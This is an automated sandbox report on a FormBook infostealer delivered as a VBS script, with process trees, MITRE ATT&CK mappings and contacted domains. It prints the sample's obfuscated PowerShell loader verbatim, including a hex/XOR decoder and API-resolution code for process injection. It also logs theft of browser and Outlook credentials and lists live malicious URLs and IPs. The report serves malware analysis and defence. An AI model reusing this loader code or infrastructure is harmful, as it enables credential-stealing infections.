      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$nonreliableness = """InFSauPanRecbutPeiRaoHunSm AfSHapOviSknRedRdeRerAeoHukTvsMa0Ch La{Af Co Ph In FrpbaaFirUraEkmBe(Sp[stSFotOrrGaiRenHigAm]Ud`$giAPanAntPohKrrStoAppCroResVecVeoBopOryCa)Id;Am Ga Le St Tr`$EpKChaudnViuSerWeisi Pr=Ho buNAleBiwCr-FrONubMojSkechcFotbi DebReyfitCoeFo[Fo]Pa Tu(Gr`$OuAAbnFatAshUnrDyoDupHeonosNocInoRepVayHy.ReLUneshnDigTotNahPi Ov/Se De2Un)Pr;Sq Ku Re Af MuFKroGerTr(Af`$SvTSirQuaHycBltUriSulMoiSutOvyAm=Wa0Sp;Un Ra`$BoTDerBoaAncVitToiLalTsiChtSeyBl Am-PalPltFe Al`$ChAChnNotInhOlrTyoMepseoPlsSycApoBspPryBu.StLUnePanWugDytsyhre;Fl Zo`$StTParUnaPrcUntDiirelPeiVitNoyPh+Pr=An2St)Ne{Dy Br Ch`$FoBBeaForFobJuaAgrHyoViuFesTh Qu=Th Ca`$XiAAfnSgtFahUnrJaoTepBroDesHecHyoEjpUlyRe.AnSHjuMabDisLotKurUriCynangSe(Ag`$TaTVerNeaUdcLktOvilelBiiSttKeyCo,ty Vr2St)Ti;Re Ba Fa Ge Bl Sv Bl Se Ns`$DrKSaaEunKouHorApiDa[Pr`$MeTBlrMeaFecBltObiUdlPriSttNoyFa/Ge2Am]Tr Ti=Ru Pa[HucDeoTanAlvBleSnrCotPe]Sy:Kl:ViTEdoPuBAfyAmtPrePr(Au`$HoBPraMirEybReaCirTaoOmuImsSy,Ov St1De6Im)St;To Be Ra`$BoKMiaNanTruBorTuise[Fl`$skTDorAmaSecIntUniChlMoiwatPlyRo/Au2Pr]Re Le=Go ba(Ba`$ToKUdaInnUnuVirUniCa[Un`$soTKrrScaAkcTitSeiFylJuiSutThyBr/em2Fo]In Un-BrbMexLkoTrrLa Vu1St5Co1Sa)Va;Du Lt In Be Ko}un Mi[suSTrtSerCaiAmnFigLi]Ch[maSboyLasDitSteAnmFi.haTSmeNexTutMo.BaEFrnEscAtoMadNoiAtnengSn]St:ca:TiAToSZeCFoIskIDr.ClGsueFitGlSFotBerStikanimgSe(St`$GrKKlaSknAnuKrrFoiCr)Ha;Gi}He`$ToMHuategOpnStaVelNoeCo2Me7De0Ga=ArSTopMiiFrnAcdPreHorSaoFakErsFr0Fa Fo'HiCOp4KeEUnEryEta4HoEAl3HaFUd2DoFSyAGrBsh9InFFj3ThFLaBAnFBoBOf'Ca;Ga`$SeMKeaUngVinnaaImlTeeDe2Kp7Al1In=TeSLopBiiDunIndSieUirFyoGekCosTa0tu Sh'FiDThAUnFGlEArFVi4LeEDi5TrFSt8EnEWa4ReFIr8KrFDi1FeEDi3BrBBa9InCKa0HuFOmEDrFFu9FaABa4SaAUn5BuBDe9GiCSl2NoFMa9KuEGe4WaFRe6MaFNo1MaFAr2KoDFu9KoFRk6FoETe3ReFGaEBaEMe1ThFEx2DoDKaAFrFMa2TaEGa3NaFEsFEcFMo8SkFPe3PrEBr4Ko'mu;El`$ImMNoaUdgNonCoaMalHoeEm2Om7Is2Pr=ApSDapskiHenAadOpeDerKooTikFrsDa0Bu fy'BoDSy0InFNa2FaEAd3DeCKu7OvECa5FoFSk8OvFPo4CuDfi6RoFEc3LeFSp3SkENs5AuFSy2InELs4ArEBa4Lg'Fo;Co`$MaMfiaRogSonHaaHolNgesy2St7Re3Ga=FySNypFliBlnEmdAmePhrMooSikStsKl0Di To'MyCHe4YaEfrEFeEDe4SeEhi3SoFTi2TeFOiAStBSl9inCSe5UhECi2loFPa9DrEKl3ViFFjETiFCaAclFCh2StBTe9GrDCoEOvFHo9PaEEl3NiFVi2OlETr5RoFAb8PrESa7StCpr4OdFGa2InETe5ToEGi1blFUdEFnFTi4TiFKb2CaEFl4SeBOt9UnDAnFChFSe6PyFYt9DeFOv3SyFEdBStFBo2SkCRe5MyFNo2AsFCe1Mo'Da;Mo`$ReMHyaStgFunToaRelnoeSl2tu7Ov4Pu=VeSTrpSaiKinVedPreKirFioUdkLesDr0Na Hi'FoEAf4ToESu3YaESt5SaFVoEFlFla9ZeFMa0Kv'Su;Ye`$DrMEnaMegkanEraJolRteCe2Cl7Va5Fo=MiSYdpHiitenThdSteCorSeoPrkCisrg0Pr Dr'KvDCo0SpFEg2YeEPd3inDUrAStFUn8CaFEn3PrEAm2NoFReBSiFPr2ChDViFInFGu6MeFca9FoFFu3ZyFHyBIgFEs2Ek'Do;Mo`$PrMPeaKegFrnScaRelHeeUn2Mi7Re6Li=LeSFopGiiSynBedvieInrXeospkZasGa0Ni vi'SyCJi5SmCHe3AsCAn4FoEbu7RdFSt2NoFCy4PeFFoEFoFRe6BiFBiBBeDro9RaFAn6NaFQuATyFDy2moBPaBClBso7EtDFoFDeFChEYeFMa3DrFSp2tuDSl5KdEGaEteCun4udFEcEomFKa0FdBAbBFiBPu7RaCSv7HaEFe2LaFHi5FaFLaBVaFPoESeFPy4So'Ra;Me`$ArMApaStgfonPraPrlSteVJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Spinderoks0 { param([String]$Anthroposcopy); $Kanuri = New-Object byte[] ($Anthroposcopy.Length / 2); For($Tractility=0; $Tractility -lt $Anthroposcopy.Length; $Tractility+=2){ $Barbarous = $Anthroposcopy.Substring($Tractility, 2); $Kanuri[$Tractility/2] = [convert]::ToByte($Barbarous, 16); $Kanuri[$Tractility/2] = ($Kanuri[$Tractility/2] -bxor 151); } [String][System.Text.Encoding]::ASCII.GetString($Kanuri);}$Magnale270=Spinderoks0 'C4EEE4E3F2FAB9F3FBFB';$Magnale271=Spinderoks0 'DAFEF4E5F8E4F8F1E3B9C0FEF9A4A5B9C2F9E4F6F1F2D9F6E3FEE1F2DAF2E3FFF8F3E4';$Magnale272=Spinderoks0 'D0F2E3C7E5F8F4D6F3F3E5F2E4E4';$Magnale273=Spinderoks0 'C4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1';$Magnale274=Spinderoks0 'E4E3E5FEF9F0';$Magnale275=Spinderoks0 'D0F2E3DAF8F3E2FBF2DFF6F9F3FBF2';$Magnale276=Spinderoks0 'C5C3C4E7F2F4FEF6FBD9F6FAF2BBB7DFFEF3F2D5EEC4FEF0BBB7C7E2F5FBFEF4';$Magnale277=Spinderoks0 'C5E2F9E3FEFAF2BBB7DAF6F9F6F0F2F3';$Magnale278=Spinderoks0 'C5F2F1FBF2F4E3F2F3D3F2FBF2F0F6E3F2';$Magnale279=Spinderoks0 'DEF9DAF2FAF8E5EEDAF8F3E2FBF2';$Dunc0=Spinderoks0 'DAEED3F2FBF2F0F6E3F2C3EEE7F2';$Dunc1=Spinderoks0 'D4FBF6E4E4BBB7C7E2F5FBFEF4BBB7C4F2F6FBF2F3BBB7D6F9E4FED4FBF6E4E4BBB7D6E2E3F8D4FBF6E4E4';$Dunc2=Spinderoks0 'DEF9E1F8FCF2';$Dunc3=Spinderoks0 'C7E2F5FBFEF4BBB7DFFEF3F2D5EEC4FEF0BBB7D9F2E0C4FBF8E3BBB7C1FEE5E3E2F6FB';$Dunc4=Spinderoks0 'C1FEE5E3E2F6FBD6FBFBF8F4';$Dunc5=Spinderoks0 'F9E3F3FBFB';$Dunc6=Spinderoks0 'D9E3C7E5F8E3F2F4E3C1FEE5E3E2F6FBDAF2FAF8E5EE';$Dunc7=Spinderoks0 'DED2CF';$Dunc8=Spinderoks0 'CB';$Udmundingers=Spinderoks0 'C2C4D2C5A4A5';$Intercessions=Spinderoks0 'D4F6FBFBC0FEF9F3F8E0C7E5F8F4D6';function fkp {Param ($Opringningernes, $Introsuction) ;$Skurvs0 =Spinderoks0 'B3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B7AAB7BFCCD6E7E7D3F8FAF6FEF9CAADADD4E2E5E5F2F9E3D3F8FAF6FEF9B9D0F2E3D6E4E4F2FAF5FBFEF2E4BFBEB7EBB7C0FFF2E5F2BAD8F5FDF2F4E3B7ECB7B3C8B9D0FBF8F5F6FBD6E4E4F2FAF5FBEED4F6F4FFF2B7BAD6F9F3B7B3C8B9DBF8F4F6E3FEF8F9B9C4E7FBFEE3BFB3D3E2F9F4AFBECCBAA6CAB9D2E6E2F6FBE4BFB3DAF6F0F9F6FBF2A5A0A7BEB7EABEB9D0F2E3C3EEE7F2BFB3DAF6F0F9F6FBF2A5A0A6BE';&($Dunc7) $Skurvs0;$Skurvs5 = Spinderoks0 'B3D2EFF4FBE2E4FEF8F9FEE4FAB7AAB7B3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B9D0F2E3DAF2E3FFF8F3BFB3DAF6F0F9F6FBF2A5A0A5BBB7CCC3EEE7F2CCCACAB7D7BFB3DAF6F0F9F6FBF2A5A0A4BBB7B3DAF6F0F9F6FBF2A5A0A3BEBE';&($Dunc7) $Skurvs5;$Skurvs1 = Spinderoks0 'E5F2E3E2E5F9B7B3D2EFF4FBE2E4FEF8F9FEE4FAB9DEF9E1F8FCF2BFB3F9E2FBFBBBB7D7BFCCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1CABFD9F2E0BAD8F5FDF2F4E3B7C4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1BFBFD9F2E0BAD8F5FDF2F4E3B7DEF9E3C7E3E5BEBBB7BFB3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B9D0F2E3DAF2E3FFF8F3BFB3DAF6F0F9F6FBF2A5A0A2BEBEB9DEF9E1F8FCF2BFB3F9E2FBFBBBB7D7BFB3D8E7E5FEF9F0F9FEF9F0F2E5F9F2E4BEBEJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: explorer.exe, 00000015.00000002.7445259742.0000000000D81000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000015.00000000.3319772637.0000000000D81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000015.00000000.3346404465.000000000CBD1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3327800677.0000000004450000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4200188854.000000000CBCE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000015.00000002.7445259742.0000000000D81000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000015.00000000.3319772637.0000000000D81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000015.00000002.7439690013.0000000000760000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3317448612.0000000000760000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progmanv
      Source: explorer.exe, 00000015.00000002.7445259742.0000000000D81000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000015.00000000.3319772637.0000000000D81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts21
      Command and Scripting Interpreter      		1
      Registry Run Keys / Startup Folder      		712
      Process Injection      		22
      Virtualization/Sandbox Evasion      		1
      OS Credential Dumping      		221
      Security Software Discovery      		Remote Services1
      Email Collection      		Exfiltration Over Other Network Medium21
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts321
      Scripting      		1
      DLL Side-Loading      		1
      Registry Run Keys / Startup Folder      		712
      Process Injection      		LSASS Memory22
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Archive Collected Data      		Exfiltration Over Bluetooth5
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Shared Modules      		Logon Script (Windows)1
      DLL Side-Loading      		11
      Deobfuscate/Decode Files or Information      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin Shares1
      Data from Local System      		Automated Exfiltration5
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts1
      PowerShell      		Logon Script (Mac)Logon Script (Mac)321
      Scripting      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer6
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script4
      Obfuscated Files or Information      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Software Packing      		Cached Domain Credentials14
      System Information Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 806416 Sample: cnf13429226.vbs Startdate: 13/02/2023 Architecture: WINDOWS Score: 100 54 www.versusfinances.tech 2->54 56 www.treebarktees.com 2->56 58 26 other IPs or domains 2->58 68 Snort IDS alert for network traffic 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Antivirus detection for URL or domain 2->72 74 5 other signatures 2->74 13 wscript.exe 1 1 2->13         started        signatures3 process4 signatures5 92 Wscript starts Powershell (via cmd or directly) 13->92 94 Obfuscated command line found 13->94 96 Very long command line found 13->96 16 powershell.exe 7 13->16         started        process6 signatures7 64 Very long command line found 16->64 19 powershell.exe 16->19         started        21 conhost.exe 16->21         started        process8 process9 23 ielowutil.exe 6 19->23         started        27 ieinstal.exe 19->27         started        29 ieinstal.exe 19->29         started        31 9 other processes 19->31 dnsIp10 60 drive.google.com 142.250.186.46, 443, 49825 GOOGLEUS United States 23->60 62 googlehosted.l.googleusercontent.com 172.217.18.1, 443, 49826 GOOGLEUS United States 23->62 84 Modifies the context of a thread in another process (thread injection) 23->84 86 Tries to detect Any.run 23->86 88 Maps a DLL or memory area into another process 23->88 90 3 other signatures 23->90 33 explorer.exe 8 2 23->33 injected signatures11 process12 dnsIp13 48 cutgang.net 194.102.227.30, 80 VODAFONE_ROCharlesdeGaullenr15RO Romania 33->48 50 flyshareinc.com 162.241.225.69, 49857, 49858, 49859 UNIFIEDLAYER-AS-1US United States 33->50 52 13 other IPs or domains 33->52 66 System process connects to network (likely due to code injection or exploit) 33->66 37 chkdsk.exe 1 13 33->37         started        40 ielowutil.exe 33->40         started        42 ielowutil.exe 33->42         started        signatures14 process15 signatures16 76 Tries to steal Mail credentials (via file / registry access) 37->76 78 Tries to harvest and steal browser information (history, passwords, etc) 37->78 80 Writes to foreign memory regions 37->80 82 3 other signatures 37->82 44 firefox.exe 37->44         started        process17 process18 46 WerFault.exe 4 44->46         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      cnf13429226.vbs2%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      22.2.chkdsk.exe.52a68a8.1.unpack100%AviraTR/Patched.Ren.Gen8Download File
      22.2.chkdsk.exe.5b83814.4.unpack100%AviraTR/Patched.Ren.Gen8Download File
      25.2.firefox.exe.cf33814.0.unpack100%AviraTR/Patched.Ren.Gen8Download File
      21.2.explorer.exe.13d43814.0.unpack100%AviraTR/Patched.Ren.Gen8Download File

      Domains

      SourceDetectionScannerLabelLink
      www.performingartshub.co.uk1%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://mscrl.micro0%Avira URL Cloudsafe
      http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.90%Avira URL Cloudsafe
      http://www.performingartshub.co.uk/gant/0%Avira URL Cloudsafe
      http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.cs0%Avira URL Cloudsafe
      https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
      http://www.brothersbears.com/gant/100%Avira URL Cloudphishing
      http://www.lakeviewautomation.com/gant/?j-Jh9P=lG1MXAoVmwgOpPlDaO5uOCVJTMHwk/fdWy8fBrW3vMUx4Eu1HaIGqjrCYnGNSU+uIBrfqi0XYB7pKAHIVdBFrPjvfY3MgrPiTA==&T9=bPxTYTKdI20%Avira URL Cloudsafe
      http://www.flyshareinc.comReferer:0%Avira URL Cloudsafe
      http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/closed/style.css?v=30%Avira URL Cloudsafe
      http://www.ixirwholesale.xyzReferer:0%Avira URL Cloudsafe
      http://www.performingartshub.co.uk0%Avira URL Cloudsafe
      http://www.thejointcomission.org100%Avira URL Cloudmalware
      https://word.office.comx0%Avira URL Cloudsafe
      https://fonts.bunny.net/css?family=Fredoka0%Avira URL Cloudsafe
      http://www.brothersbears.com/?fp=B0INY8snl8mw%2BcAJH72nUzYVCaUxbDaGdZbUB3wx2UlG%2BELJV8E7p0rxWg6dgbH100%Avira URL Cloudphishing
      http://www.touchdress.site100%Avira URL Cloudmalware
      http://lakeviewautomation.com/wp-login.php0%Avira URL Cloudsafe
      http://www.japurima.com100%Avira URL Cloudmalware
      http://www.japurima.comReferer:0%Avira URL Cloudsafe
      http://www.dachmotors.com/gant/?j-Jh9P=B0pNFIyvfWNbMZ+y1M/LgZADusV71feeQe6W+GB1ssl6KD/NibUunE4IvTatYpRgFtRcLWhob4pstpOdFq/XGd2nPwIBJf7TLg==&T9=bPxTYTKdI20%Avira URL Cloudsafe
      http://www.gargaloid.ru/gant/0%Avira URL Cloudsafe
      http://www.otopodlogi.comReferer:0%Avira URL Cloudsafe
      http://www.otopodlogi.com/gant/?j-Jh9P=2tUZKRHByxlttwUxv+GOcisphN8ZGwJH956H6V+vFw98R8B9R+q1qFuRbo6W7NeIxARixWcpsfkmwl3+P8H59+TtZSMQFDV9NQ==&T9=bPxTYTKdI20%Avira URL Cloudsafe
      http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/closed/closed.png0%Avira URL Cloudsafe
      http://www.dachmotors.comReferer:0%Avira URL Cloudsafe
      http://www.hotelyeah.top/gant/0%Avira URL Cloudsafe
      http://www.treebarktees.com/gant/0%Avira URL Cloudsafe
      http://www.brothersbears.comReferer:0%Avira URL Cloudsafe
      http://www.sciencevale.xyz0%Avira URL Cloudsafe
      http://www.gargaloid.ru0%Avira URL Cloudsafe
      http://www.otopodlogi.com/gant/0%Avira URL Cloudsafe
      http://www.thejointcomission.orgReferer:0%Avira URL Cloudsafe
      http://www.flyshareinc.com/gant/0%Avira URL Cloudsafe
      http://www.sciencevale.xyz/gant/0%Avira URL Cloudsafe
      http://www.lakeviewautomation.comReferer:0%Avira URL Cloudsafe
      http://www.grenoble-informatique.com/gant/?j-Jh9P=2JL3CIBt3IC0PgoAudQ1L9Eb6D+VDac3U4mviwi6NXYkyXwKlhT1jupAATRxZoEWPtU5/NPFAf7q3b9zYMRU8+5k3iEXReAvBw==&T9=bPxTYTKdI20%Avira URL Cloudsafe
      http://www.redystedy.com/gant/0%Avira URL Cloudsafe
      http://www.ixirwholesale.xyz0%Avira URL Cloudsafe
      http://www.b-yy.xyz/gant/100%Avira URL Cloudphishing
      http://treebarktees.com/gant/?j-Jh9P=TyiG4SYT4QZjW5cpsFN/2IY0LPBGgIfJh6ADM61dYWsbGNZtiA4uKO4tvwXfoLZ0%Avira URL Cloudsafe
      http://www.cc564966.comReferer:0%Avira URL Cloudsafe
      http://www.redystedy.comReferer:0%Avira URL Cloudsafe
      http://www.cutgang.netReferer:0%Avira URL Cloudsafe
      http://www.jewelryimpact.com/gant/0%Avira URL Cloudsafe
      http://www.thejointcomission.org/gant/?j-Jh9P=MQtjD5X22poUyMv7ES4tvtca33r9y2dLYuXFkx7pCBQejezRhizA21G5ExCHCl6M5sdibhXBm0qE1VdFv4a9rmk6iqpvFYiiMw==&T9=bPxTYTKdI2100%Avira URL Cloudmalware
      http://www.lakeviewautomation.com/gant/0%Avira URL Cloudsafe
      http://www.jewelryimpact.comReferer:0%Avira URL Cloudsafe
      http://www.versusfinances.techReferer:0%Avira URL Cloudsafe
      http://www.dachmotors.com0%Avira URL Cloudsafe
      https://dts.gnpge.com0%Avira URL Cloudsafe
      http://www.cutgang.net/gant/0%Avira URL Cloudsafe
      http://www.cutgang.net/0%Avira URL Cloudsafe
      http://www.grenoble-informatique.comReferer:0%Avira URL Cloudsafe
      http://www.hotelyeah.top/gant/?j-Jh9P=/4uePDAndv7VRKlxJSWWYF+9JWnpnxC+Pqu0glR/gWphXDvAzD/IhhQUyrVK/VMLXFR13n1QlAsq5EiJSOA8G9jIKMVd5okpcw==&T9=bPxTYTKdI20%Avira URL Cloudsafe
      http://www.performingartshub.co.uk/gant/?j-Jh9P=UNNYdcSQH8G7azuEeyjHGvIpwoKghrgSH3Udh5NSOmta1bwA4yZMM4UvAxe/iGptPmuGT4M6JuNJB68yuzE0hMzX7pwOCu8H8A==&T9=bPxTYTKdI20%Avira URL Cloudsafe
      http://www.sciencevale.xyz/gant/?j-Jh9P=0t3ZvwpEqVsRCOwRlikXMWB7Ea95BZez04foFL6wYLCqffSg77P+YtyukHRVRGclol71et68nIyUJ+scOlPmXgSdPrpnjIlS4g==&T9=bPxTYTKdI20%Avira URL Cloudsafe
      http://www.brothersbears.com100%Avira URL Cloudphishing
      http://www.cutgang.net0%Avira URL Cloudsafe
      http://www.sciencevale.xyzReferer:0%Avira URL Cloudsafe
      http://schemas.micro0%Avira URL Cloudsafe
      http://www.ixirwholesale.xyz/gant/0%Avira URL Cloudsafe
      http://www.dachmotors.com/gant/0%Avira URL Cloudsafe
      http://www.versusfinances.tech0%Avira URL Cloudsafe
      http://www.hotelyeah.top0%Avira URL Cloudsafe
      http://www.redystedy.com0%Avira URL Cloudsafe
      http://www.flyshareinc.com0%Avira URL Cloudsafe
      http://www.thejointcomission.org/gant/100%Avira URL Cloudmalware
      http://www.grenoble-informatique.com/gant/0%Avira URL Cloudsafe
      http://www.grenoble-informatique.com0%Avira URL Cloudsafe
      http://www.cc564966.com/gant/0%Avira URL Cloudsafe
      http://dachmotors.com/gant/?j-Jh9P=B0pNFIyvfWNbMZ0%Avira URL Cloudsafe
      http://www.cc564966.com/gant/?j-Jh9P=gtmxM9sVToXKjMyTASxBPF0sq9AFFQGD43p7DhxGmNljyvBNaufr2S5kOWNcewkSSruZtMGwxAitLcOH1ReRcd40xShNtBsThw==&T9=bPxTYTKdI20%Avira URL Cloudsafe
      http://www.otopodlogi.com0%Avira URL Cloudsafe
      http://www.gargaloid.ruReferer:0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      lakeviewautomation.com
      		142.44.131.177
      		truetrue
        		unknown
        www.thejointcomission.org
        		173.255.194.134
        		truetrue
          		unknown
          www.performingartshub.co.uk
          		217.160.0.64
          		truetrueunknown
          p102vty.yb559.com
          		147.92.47.182
          		truetrue
            		unknown
            www.otopodlogi.com
            		188.114.97.3
            		truetrue
              		unknown
              gargaloid.ru
              		185.215.4.36
              		truetrue
                		unknown
                treebarktees.com
                		103.191.208.50
                		truetrue
                  		unknown
                  www.brothersbears.com
                  		208.91.197.91
                  		truetrue
                    		unknown
                    cutgang.net
                    		194.102.227.30
                    		truetrue
                      		unknown
                      flyshareinc.com
                      		162.241.225.69
                      		truetrue
                        		unknown
                        dachmotors.com
                        		198.251.81.247
                        		truetrue
                          		unknown
                          drive.google.com
                          		142.250.186.46
                          		truefalse
                            		high
                            www.grenoble-informatique.com
                            		217.160.0.37
                            		truetrue
                              		unknown
                              hotelyeah.top
                              		75.102.22.168
                              		truetrue
                                		unknown
                                googlehosted.l.googleusercontent.com
                                		172.217.18.1
                                		truefalse
                                  		high
                                  sciencevale.xyz
                                  		192.154.231.174
                                  		truetrue
                                    		unknown
                                    www.treebarktees.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.sciencevale.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.hotelyeah.top
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.touchdress.site
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.dachmotors.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.flyshareinc.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.lakeviewautomation.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.versusfinances.tech
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    doc-10-2g-docs.googleusercontent.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      www.cutgang.net
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.gargaloid.ru
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.cc564966.com
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
